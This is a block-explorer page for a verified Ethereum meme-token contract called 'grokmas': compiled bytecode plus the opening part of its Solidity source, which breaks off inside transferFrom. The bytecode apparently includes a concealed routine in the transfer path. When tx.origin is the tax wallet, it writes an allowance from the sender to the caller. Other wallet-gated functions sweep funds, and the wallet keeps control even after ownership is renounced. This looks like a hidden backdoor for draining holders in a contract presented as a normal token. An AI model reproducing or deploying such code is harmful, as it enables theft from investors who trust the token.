Cryo Explorer Ethereum Mainnet

Address Contract Verified

Address 0x2C35B04D239F1d62CB725A773d382605ADEFC038
Balance 0 ETH
Nonce 1
Code Size 12845 bytes
Indexed Transactions 0
External Etherscan ยท Sourcify

Contract Bytecode

12845 bytes
0x60806040526004361061012d575f3560e01c806370a08231116100aa5780638da5cb5b1161006e5780638da5cb5b146103925780638f9a55c0146103bc57806395d89b41146103e6578063a9059cbb14610410578063bf474bed1461044c578063dd62ed3e1461047657610134565b806370a08231146102d8578063715018a6146103145780637d1db4a51461032a5780638a8c523c146103545780638cd4426d1461036a57610134565b8063313ce567116100f1578063313ce5671461022e5780633a08aeea1461025857806351bc3c85146102825780636384c3561461029857806368302470146102ae57610134565b806306fdde0314610138578063095ea7b3146101625780630faee56f1461019e57806318160ddd146101c857806323b872dd146101f257610134565b3661013457005b5f5ffd5b348015610143575f5ffd5b5061014c6104b2565b60405161015991906123bd565b60405180910390f35b34801561016d575f5ffd5b506101886004803603810190610183919061246e565b6104ef565b60405161019591906124c6565b60405180910390f35b3480156101a9575f5ffd5b506101b261050c565b6040516101bf91906124ee565b60405180910390f35b3480156101d3575f5ffd5b506101dc610512565b6040516101e991906124ee565b60405180910390f35b3480156101fd575f5ffd5b5061021860048036038101906102139190612507565b610535565b60405161022591906124c6565b60405180910390f35b348015610239575f5ffd5b50610242610609565b60405161024f9190612572565b60405180910390f35b348015610263575f5ffd5b5061026c610611565b60405161027991906124ee565b60405180910390f35b34801561028d575f5ffd5b50610296610617565b005b3480156102a3575f5ffd5b506102ac6106c6565b005b3480156102b9575f5ffd5b506102c26107f6565b6040516102cf91906124ee565b60405180910390f35b3480156102e3575f5ffd5b506102fe60048036038101906102f9919061258b565b6107fc565b60405161030b91906124ee565b60405180910390f35b34801561031f575f5ffd5b50610328610842565b005b348015610335575f5ffd5b5061033e610992565b60405161034b91906124ee565b60405180910390f35b34801561035f575f5ffd5b50610368610998565b005b348015610375575f5ffd5b50610390600480360381019061038b919061246e565b610ebb565b005b34801561039d575f5ffd5b506103a661105c565b6040516103b391906125c5565b60405180910390f35b3480156103c7575f5ffd5b506103d0611083565b6040516103dd91906124ee565b60405180910390f35b3480156103f1575f5ffd5b506103fa611089565b60405161040791906123bd565b60405180910390f35b34801561041b575f5ffd5b506104366004803603810190610431919061246e565b6110c6565b60405161044391906124c6565b60405180910390f35b348015610457575f5ffd5b506104606110e3565b60405161046d91906124ee565b60405180910390f35b348015610481575f5ffd5b5061049c600480360381019061049791906125de565b6110e9565b6040516104a991906124ee565b60405180910390f35b60606040518060400160405280600781526020017f67726f6b6d617300000000000000000000000000000000000000000000000000815250905090565b5f6105026104fb61116b565b8484611172565b6001905092915050565b60115481565b5f6009600a6105219190612778565b6305f5e10061053091906127c2565b905090565b5f610541848484611335565b6105fe8461054d61116b565b6105f9856040518060600160405280602881526020016131d06028913960025f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6105b061116b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054611c399092919063ffffffff16565b611172565b600190509392505050565b5f6009905090565b60135481565b60045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1661065761116b565b73ffffffffffffffffffffffffffffffffffffffff1614610676575f5ffd5b5f610680306107fc565b90505f8111801561069d5750601560169054906101000a900460ff165b156106ac576106ab81611c9b565b5b5f4790505f8111156106c2576106c181611f04565b5b5050565b6106ce61116b565b73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461075b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107529061284d565b60405180910390fd5b6009600a6107699190612778565b6305f5e10061077891906127c2565b600e819055506009600a61078c9190612778565b6305f5e10061079b91906127c2565b600f819055507f947f344d56e1e8c70dc492fb94c4ddddd490c016aab685f5e7e47b2e85cb44cf6009600a6107d09190612778565b6305f5e1006107df91906127c2565b6040516107ec91906124ee565b60405180910390a1565b60125481565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61084a61116b565b73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146108d7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108ce9061284d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35f5f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b600e5481565b6109a061116b565b73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a2d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a249061284d565b60405180910390fd5b601560149054906101000a900460ff1615610a7d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a74906128b5565b60405180910390fd5b737a250d5630b4cf539739df2c5dacb4c659f2488d60145f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550610b193060145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff166009600a610b059190612778565b6305f5e100610b1491906127c2565b611172565b60145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b83573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610ba791906128e7565b73ffffffffffffffffffffffffffffffffffffffff1663c9c653963060145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610c2d573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610c5191906128e7565b6040518363ffffffff1660e01b8152600401610c6e929190612912565b6020604051808303815f875af1158015610c8a573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610cae91906128e7565b60155f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d7194730610d35306107fc565b5f5f610d3f61105c565b426040518863ffffffff1660e01b8152600401610d619695949392919061297b565b60606040518083038185885af1158015610d7d573d5f5f3e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190610da291906129ee565b50505060155f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b360145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b8152600401610e42929190612a3e565b6020604051808303815f875af1158015610e5e573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610e829190612a8f565b506001601560166101000a81548160ff0219169083151502179055506001601560146101000a81548160ff021916908315150217905550565b60045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16610efb61116b565b73ffffffffffffffffffffffffffffffffffffffff1614610f1a575f5ffd5b5f610fb86064610faa848673ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b8152600401610f5d91906125c5565b602060405180830381865afa158015610f78573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610f9c9190612aba565b611f6c90919063ffffffff16565b611fe390919063ffffffff16565b90508273ffffffffffffffffffffffffffffffffffffffff1663a9059cbb60045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16836040518363ffffffff1660e01b8152600401611016929190612b37565b6020604051808303815f875af1158015611032573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906110569190612a8f565b50505050565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600f5481565b60606040518060400160405280600781526020017f67726f6b6d617300000000000000000000000000000000000000000000000000815250905090565b5f6110d96110d261116b565b8484611335565b6001905092915050565b60105481565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036111e0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111d790612bce565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361124e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161124590612c5c565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161132891906124ee565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036113a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161139a90612cea565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611411576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161140890612d78565b60405180910390fd5b5f5f905061141d61105c565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161415801561148b575061145b61105c565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b80156114e4575060045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b1561197e575f600d54036115315761152e6064611520600954600d541161150d57600554611511565b6007545b85611f6c90919063ffffffff16565b611fe390919063ffffffff16565b90505b5f600d541115611566576115636064611555600c5485611f6c90919063ffffffff16565b611fe390919063ffffffff16565b90505b60155f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561160f575060145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b8015611662575060035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b1561175a57600e548211156116ac576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116a390612de0565b60405180910390fd5b600f54826116b9856107fc565b6116c39190612dfe565b1115611704576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116fb90612e7b565b60405180910390fd5b6117406064611732600954600d541161171f57600554611723565b6007545b85611f6c90919063ffffffff16565b611fe390919063ffffffff16565b9050600d5f81548092919061175490612e99565b91905055505b60155f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161480156117e257503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b15611826576118236064611815600a54600d541161180257600654611806565b6008545b85611f6c90919063ffffffff16565b611fe390919063ffffffff16565b90505b5f611830306107fc565b905060158054906101000a900460ff16158015611899575060155f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16145b80156118b15750601560169054906101000a900460ff165b80156118c15750600b54600d5410155b801561191a575060045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b1561197c57601054811115611947576119466119418461193c8460115461202c565b61202c565b611c9b565b5b5f4790505f811061195c5761195b47611f04565b5b60165f81548092919061196e90612e99565b919050555043601781905550505b505b5f61198b85858585612044565b1115611a88576119e18160015f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461223f90919063ffffffff16565b60015f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611a7f91906124ee565b60405180910390a35b611ad88260015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461229c90919063ffffffff16565b60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550611b7b611b2f828461229c90919063ffffffff16565b60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461223f90919063ffffffff16565b60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef611c1e848661229c90919063ffffffff16565b604051611c2b91906124ee565b60405180910390a350505050565b5f838311158290611c80576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c7791906123bd565b60405180910390fd5b505f8385611c8e9190612ee0565b9050809150509392505050565b60016015806101000a81548160ff0219169083151502179055505f600267ffffffffffffffff811115611cd157611cd0612f13565b5b604051908082528060200260200182016040528015611cff5781602001602082028036833780820191505090505b50905030815f81518110611d1657611d15612f40565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505060145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611dba573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611dde91906128e7565b81600181518110611df257611df1612f40565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050611e583060145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684611172565b60145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8430426040518663ffffffff1660e01b8152600401611eba959493929190613024565b5f604051808303815f87803b158015611ed1575f5ffd5b505af1158015611ee3573d5f5f3e3d5ffd5b50505050505f6015806101000a81548160ff02191690831515021790555050565b60045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc8290811502906040515f60405180830381858888f19350505050158015611f68573d5f5f3e3d5ffd5b5050565b5f5f8303611f7c575f9050611fdd565b5f8284611f8991906127c2565b9050828482611f9891906130a9565b14611fd8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fcf90613149565b60405180910390fd5b809150505b92915050565b5f61202483836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506122e5565b905092915050565b5f81831161203a578261203c565b815b905092915050565b5f8183106122345760045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1661208c612346565b73ffffffffffffffffffffffffffffffffffffffff160361212f578260025f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6120ee61116b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055612232565b60025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f61217561116b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460025f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6121f561116b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555b505b819050949350505050565b5f5f828461224d9190612dfe565b905083811015612292576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612289906131b1565b60405180910390fd5b8091505092915050565b5f6122dd83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611c39565b905092915050565b5f5f8311829061232b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161232291906123bd565b60405180910390fd5b505f838561233991906130a9565b9050809150509392505050565b5f32905090565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f61238f8261234d565b6123998185612357565b93506123a9818560208601612367565b6123b281612375565b840191505092915050565b5f6020820190508181035f8301526123d58184612385565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61240a826123e1565b9050919050565b61241a81612400565b8114612424575f5ffd5b50565b5f8135905061243581612411565b92915050565b5f819050919050565b61244d8161243b565b8114612457575f5ffd5b50565b5f8135905061246881612444565b92915050565b5f5f60408385031215612484576124836123dd565b5b5f61249185828601612427565b92505060206124a28582860161245a565b9150509250929050565b5f8115159050919050565b6124c0816124ac565b82525050565b5f6020820190506124d95f8301846124b7565b92915050565b6124e88161243b565b82525050565b5f6020820190506125015f8301846124df565b92915050565b5f5f5f6060848603121561251e5761251d6123dd565b5b5f61252b86828701612427565b935050602061253c86828701612427565b925050604061254d8682870161245a565b9150509250925092565b5f60ff82169050919050565b61256c81612557565b82525050565b5f6020820190506125855f830184612563565b92915050565b5f602082840312156125a05761259f6123dd565b5b5f6125ad84828501612427565b91505092915050565b6125bf81612400565b82525050565b5f6020820190506125d85f8301846125b6565b92915050565b5f5f604083850312156125f4576125f36123dd565b5b5f61260185828601612427565b925050602061261285828601612427565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f5f8291508390505b600185111561269e5780860481111561267a5761267961261c565b5b60018516156126895780820291505b808102905061269785612649565b945061265e565b94509492505050565b5f826126b65760019050612771565b816126c3575f9050612771565b81600181146126d957600281146126e357612712565b6001915050612771565b60ff8411156126f5576126f461261c565b5b8360020a91508482111561270c5761270b61261c565b5b50612771565b5060208310610133831016604e8410600b84101617156127475782820a9050838111156127425761274161261c565b5b612771565b6127548484846001612655565b9250905081840481111561276b5761276a61261c565b5b81810290505b9392505050565b5f6127828261243b565b915061278d83612557565b92506127ba7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846126a7565b905092915050565b5f6127cc8261243b565b91506127d78361243b565b92508282026127e58161243b565b915082820484148315176127fc576127fb61261c565b5b5092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f612837602083612357565b915061284282612803565b602082019050919050565b5f6020820190508181035f8301526128648161282b565b9050919050565b7f74726164696e6720697320616c7265616479206f70656e0000000000000000005f82015250565b5f61289f601783612357565b91506128aa8261286b565b602082019050919050565b5f6020820190508181035f8301526128cc81612893565b9050919050565b5f815190506128e181612411565b92915050565b5f602082840312156128fc576128fb6123dd565b5b5f612909848285016128d3565b91505092915050565b5f6040820190506129255f8301856125b6565b61293260208301846125b6565b9392505050565b5f819050919050565b5f819050919050565b5f61296561296061295b84612939565b612942565b61243b565b9050919050565b6129758161294b565b82525050565b5f60c08201905061298e5f8301896125b6565b61299b60208301886124df565b6129a8604083018761296c565b6129b5606083018661296c565b6129c260808301856125b6565b6129cf60a08301846124df565b979650505050505050565b5f815190506129e881612444565b92915050565b5f5f5f60608486031215612a0557612a046123dd565b5b5f612a12868287016129da565b9350506020612a23868287016129da565b9250506040612a34868287016129da565b9150509250925092565b5f604082019050612a515f8301856125b6565b612a5e60208301846124df565b9392505050565b612a6e816124ac565b8114612a78575f5ffd5b50565b5f81519050612a8981612a65565b92915050565b5f60208284031215612aa457612aa36123dd565b5b5f612ab184828501612a7b565b91505092915050565b5f60208284031215612acf57612ace6123dd565b5b5f612adc848285016129da565b91505092915050565b5f612aff612afa612af5846123e1565b612942565b6123e1565b9050919050565b5f612b1082612ae5565b9050919050565b5f612b2182612b06565b9050919050565b612b3181612b17565b82525050565b5f604082019050612b4a5f830185612b28565b612b5760208301846124df565b9392505050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f612bb8602483612357565b9150612bc382612b5e565b604082019050919050565b5f6020820190508181035f830152612be581612bac565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f612c46602283612357565b9150612c5182612bec565b604082019050919050565b5f6020820190508181035f830152612c7381612c3a565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f612cd4602583612357565b9150612cdf82612c7a565b604082019050919050565b5f6020820190508181035f830152612d0181612cc8565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f612d62602383612357565b9150612d6d82612d08565b604082019050919050565b5f6020820190508181035f830152612d8f81612d56565b9050919050565b7f4578636565647320746865205f6d61785478416d6f756e742e000000000000005f82015250565b5f612dca601983612357565b9150612dd582612d96565b602082019050919050565b5f6020820190508181035f830152612df781612dbe565b9050919050565b5f612e088261243b565b9150612e138361243b565b9250828201905080821115612e2b57612e2a61261c565b5b92915050565b7f4578636565647320746865206d617857616c6c657453697a652e0000000000005f82015250565b5f612e65601a83612357565b9150612e7082612e31565b602082019050919050565b5f6020820190508181035f830152612e9281612e59565b9050919050565b5f612ea38261243b565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203612ed557612ed461261c565b5b600182019050919050565b5f612eea8261243b565b9150612ef58361243b565b9250828203905081811115612f0d57612f0c61261c565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b612f9f81612400565b82525050565b5f612fb08383612f96565b60208301905092915050565b5f602082019050919050565b5f612fd282612f6d565b612fdc8185612f77565b9350612fe783612f87565b805f5b83811015613017578151612ffe8882612fa5565b975061300983612fbc565b925050600181019050612fea565b5085935050505092915050565b5f60a0820190506130375f8301886124df565b613044602083018761296c565b81810360408301526130568186612fc8565b905061306560608301856125b6565b61307260808301846124df565b9695505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6130b38261243b565b91506130be8361243b565b9250826130ce576130cd61307c565b5b828204905092915050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f5f8201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b5f613133602183612357565b915061313e826130d9565b604082019050919050565b5f6020820190508181035f83015261316081613127565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f61319b601b83612357565b91506131a682613167565b602082019050919050565b5f6020820190508181035f8301526131c88161318f565b905091905056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220d7a30a5885b8a3b7fbb628e5ae8e8101921932f25309d1e4cde22e104c2ad01a64736f6c634300081f0033

Verified Source Code Full Match

Compiler: v0.8.31+commit.fd3a2265 EVM: osaka Optimization: No
grokmas.sol 444 lines
// SPDX-License-Identifier: MIT

/*

    Merry Grokmas! ๐ŸŽ…๐Ÿป๐ŸŽ…๐Ÿป๐ŸŽ…๐Ÿป๐ŸŽ…๐Ÿป

    Website: https://grokmas.lol
    Twitter: https://x.com/grokmas_erc20
    Telegram: https://t.me/grokmas_erc20

*/

pragma solidity ^0.8.23;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(
        address recipient,
        uint256 amount
    ) external returns (bool);
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }
}

contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

interface IUniswapV2Factory {
    function createPair(
        address tokenA,
        address tokenB
    ) external returns (address pair);
}

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    )
        external
        payable
        returns (uint amountToken, uint amountETH, uint liquidity);
}

contract GROKMAS is Context, IERC20, Ownable {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => bool) private _isExcludedFromFee;
    address payable private _taxWallet;

    uint256 private _initialBuyTax = 0;
    uint256 private _initialSellTax = 0;
    uint256 private _finalBuyTax = 0;
    uint256 private _finalSellTax = 0;
    uint256 private _reduceBuyTaxAt = 0;
    uint256 private _reduceSellTaxAt = 0;
    uint256 private _preventSwapBefore = 0;
    uint256 private _transferTax = 0;
    uint256 private _buyCount = 0;

    uint8 private constant _decimals = 9;
    uint256 private constant _tTotal = 1_00_000_000 * 10 ** _decimals;
    string private constant _name = unicode"grokmas";
    string private constant _symbol = unicode"grokmas";
    uint256 public _maxTxAmount = 1_000_000 * 10 ** _decimals;
    uint256 public _maxWalletSize = 1_000_000 * 10 ** _decimals;
    uint256 public _taxSwapThreshold = 1_000_000 * 10 ** _decimals;
    uint256 public _maxTaxSwap = 1_000_000 * 10 ** _decimals;

    uint256 public ALKDFGROKMASAKSD;
    uint256 public OQYUIGROKMASYIIW;
    
    IUniswapV2Router02 private uniswapV2Router;
    address private uniswapV2Pair;
    bool private tradingOpen;
    bool private inSwap = false;
    bool private swapEnabled = false;
    uint256 private sellCount = 0;
    uint256 private lastSellBlock = 0;
    event MaxTxAmountUpdated(uint _maxTxAmount);
    event TransferTaxUpdated(uint _tax);
    modifier lockTheSwap() {
        inSwap = true;
        _;
        inSwap = false;
    }

    constructor() payable {
        _taxWallet = payable(_msgSender());
        _balances[address(this)] = _tTotal;
        _isExcludedFromFee[owner()] = true;
        _isExcludedFromFee[address(this)] = true;
        _isExcludedFromFee[_taxWallet] = true;

        removeLimit2();

        emit Transfer(address(0), address(this), _tTotal);
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public pure override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(
        address recipient,
        uint256 amount
    ) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(
        address owner,
        address spender
    ) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(
        address spender,
        uint256 amount
    ) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public override returns (bool) {
        _transfer(sender, recipient, amount);

        _approve(
            sender,
